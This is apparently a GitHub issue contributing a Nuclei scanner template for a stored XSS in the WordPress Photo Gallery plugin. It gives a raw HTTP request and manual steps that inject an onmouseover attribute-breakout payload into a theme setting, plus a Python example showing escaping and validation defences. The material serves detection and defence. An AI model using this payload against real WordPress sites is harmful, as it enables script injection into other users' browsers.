Open
Labels: template-contribution (Nuclei template contribution)
Description
Is there an existing template for this?
- I have searched the existing templates.
Nuclei Template
```yaml
id: wordpress-photo-gallery-xss

info:
  name: WordPress Photo Gallery Plugin Stored XSS
  author: 0xr2r
  severity: high
  description: |
    Detects stored XSS vulnerability in WordPress Photo Gallery plugin version 1.8.26. The payload is injected in the "Distance between pictures" field and executes when the page is loaded.
  tags: wordpress,xss,stored,plugin
  reference:
    - https://10web.io/plugins/wordpress-photo-gallery/

http:
  # Request 1: submit the theme edit form ({{cookie}} is an authenticated session supplied at run time)
  - raw:
      - |
        POST /wp-admin/admin.php?page=themes_bwg&task=edit&current_id=2 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: {{cookie}}

        distance_between_pictures="onmouseover=\"alert(1)\"style=\"position:absolute;width:100%;height:100%;top:0;left:0;\"qq9r3"

    extractors:
      - type: regex
        name: csrf_token
        part: body
        regex:
          - '<input\s+type="hidden"\s+name="_wpnonce"\s+value="([a-zA-Z0-9]+)"' # Extract CSRF token
        internal: true

  # Request 2: reload the theme edit page and look for the stored value in the response
  - raw:
      - |
        GET /wp-admin/admin.php?page=themes_bwg&task=edit&current_id=2 HTTP/1.1
        Host: {{Hostname}}
        Cookie: {{cookie}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "onmouseover=\"alert(1)\""

      - type: word
        part: header
        words:
          - "text/html"
```
Relevant dumped responses
### Steps to Execute the Payload:
1. Click Photo Gallery > Themes > Edit Themes > https://127.0.0.1/wp-admin/admin.php?page=themes_bwg&task=edit&current_id=2
2. In "Distance between pictures", place your payload: `"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"qq9r3`
3. Click Update
4. You will see the payload executed
Anything else?
No response
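The defensive side of this report, as an added example that is not part of the original issue or of the plugin's code: the reported value is rendered once unescaped and once with output encoding, and a parser check shows whether an event-handler attribute results. The `<input>` rendering context, the function names and the 0 to 1000 pixel range are assumptions made for illustration.

```python
import html
from html.parser import HTMLParser

# Constructed sample: the value given in the report's reproduction steps.
REPORTED_VALUE = ('"onmouseover="alert(1)"style="position:absolute;width:100%;'
                  'height:100%;top:0;left:0;"qq9r3')
# Assumed rendering context (hypothetical, not taken from the plugin).
FIELD = '<input type="text" name="distance_between_pictures" value="{}">'


def render_unescaped(value):
    # "Before": the stored setting is placed in the attribute as-is.
    return FIELD.format(value)


def render_escaped(value):
    # Output encoding: quotes become &quot;, so the value stays inside value="...".
    return FIELD.format(html.escape(value, quote=True))


def parse_pixels(value, lowest=0, highest=1000):
    # Input validation: a pixel distance is a bounded ASCII integer, nothing else.
    text = value.strip()
    if not (text.isascii() and text.isdigit()):
        raise ValueError("distance_between_pictures must be a whole number")
    number = int(text)
    if not lowest <= number <= highest:
        raise ValueError("distance_between_pictures out of range")
    return number


class _AttributeNames(HTMLParser):
    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        self.names.extend(name for name, _ in attrs)


def event_handler_attributes(markup):
    # Parse the markup and report any on* attributes it ended up with.
    parser = _AttributeNames()
    parser.feed(markup)
    parser.close()
    return sorted(n for n in parser.names if n.startswith("on"))


if __name__ == "__main__":
    print(event_handler_attributes(render_unescaped(REPORTED_VALUE)))
    print(event_handler_attributes(render_escaped(REPORTED_VALUE)))
```

Validation on save (`parse_pixels`) and encoding on output (`render_escaped`) are independent controls; either one alone keeps the reported value from becoming markup in this context.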